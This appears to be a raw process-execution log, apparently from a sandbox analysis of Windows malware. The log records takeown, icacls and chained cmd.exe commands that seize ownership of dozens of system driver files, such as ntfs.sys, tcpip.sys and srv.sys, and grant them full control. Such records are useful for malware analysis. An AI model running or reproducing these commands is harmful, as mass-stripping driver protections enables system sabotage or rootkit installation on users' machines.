icacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nfrd960.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netio.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\npfs.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ntfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nsiproxy.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\null.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvraid.sys
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-767348041-1026827181544141063-1338409625938758166619160371-9596168031617243366"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvstor.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NV_AGP.SYS
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nwifi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\partmgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pacer.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pci.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ohci1394.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciide.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcmcia.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\parport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciidex.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\PEAuth.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcw.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ql2300.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\processr.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-849558772-920276630-3332335372006697455-11627957101218434821-1337156226953193726"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\portcls.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ql40xx.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\qwavedrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2076895029-2001306698-1297830987-1023682694855611755-192659730725361652366288406"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rasacd.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rasl2tp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\raspppoe.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\raspptp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rassstp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdbss.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdpbus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdpdr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\RDPCDD.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\RDPENCDD.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\RDPREFMP.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "131197621-2044575529-1304336210537559764-1660967616-822976476-187918570-6295702"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdyboost.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rdpwd.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rmcast.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rootmdm.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\RNDISMP.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\rspndr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Rtnic64.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sbp2port.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\scfilter.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-275867954-816991609-1973482163212926253543460737-2087791122-992445457-680969347"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "110306519433655741875088130-1969021722-1141734097-1985945776-14877061921538306937"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\secdrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\scsiport.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\serial.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\serenum.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sffdisk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sermouse.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sffp_mmc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sffp_sd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sfloppy.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sisraid2.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\smclib.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\spldr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\sisraid4.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\smb.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1439523849-89855239417051189187311152-753292813-6688488201229614800789990040"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\spsys.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\srv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\spsys.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\srvnet.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\stexstor.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\srv2.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\storport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\storport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\storvsc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\stream.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\stream.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\swenum.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tcpip.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tape.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\swenum.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
